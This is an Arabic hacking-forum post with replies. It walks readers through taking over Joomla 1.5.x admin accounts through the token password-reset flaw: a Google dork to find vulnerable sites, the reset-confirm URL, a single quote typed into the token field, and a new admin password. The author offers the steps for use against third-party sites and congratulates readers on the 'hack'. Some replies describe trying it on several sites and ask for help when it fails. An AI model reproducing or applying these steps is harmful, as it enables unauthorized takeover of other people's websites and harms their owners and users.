اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله ****** Joomla=========== Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability الأصدارات المصابة 1.5.x نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن هسه ندخل على التطبيق ولبحث الدورك البحث تدخل تفتح الكوكل صديقنا Google وتكدب هاذا الكود الي هوه الدورك كود PHP: inurl:index.php?option=com_use طلعتنه هوايه مواقع مصابه تختار احد من هن هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب ندخل للموقع المصاب ونضيف هاذا المسار كود PHP: index.php?option=com_user&view=reset&layout=confir m يصير هيجي يعني كود PHP: http://www.XXXXXX.com/index.php?opti...layout=confirm راح يطلع مربع اسمة "token نخلي بل مربع هاذي العلامه النقطه ' هسه راج يطلب منك باسورد جديد تكتب الباسورد الي تريده وتعيد كتابته مره لخ ومبرووك الاختراقق خوما صعبه ااذا صعبه كلولي نلقاكم بدرس اخررر
معهد شموخ العرب لتطوير وبرمجة المنتديات
بارك الله فيك يا مبدع . بالتوفيق
لا اله الا الله محمد رسول الله
مشكور حبي عالمرور
يسلمووو
مشكور اخوان على الردود
مشكور حبيبي بس شغلة لما تحط ' تضغط على submit ???
بارك الله فيك
جربتها اخى ولكن ما ظبطت معى على اكثر من موقع ويقول لى ان الرمز التأكيدى خطأ ولدى سؤال هل فى خانة اليوزر اكتب admin ولا اتركها فارغة وهل اكتب فى token هذه النقطة . ام هذه ' وياريت يا اخى تقولى ليه مش عايزه تظبط معى وايه الاخطاء المحتملة؟
مكشور حبيب اخي بس الثغرة نسب النجاح فيا شوية ضئيلة
لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك يوجد ايميلات ثلاثية للمبادلة
اه بالنسبه لها قليله وكثير مواقع رقعتها ولكن في كم موقع عالعموم تضعون في الخانة ' اذا منجحت مرقعه
قوانين المنتدى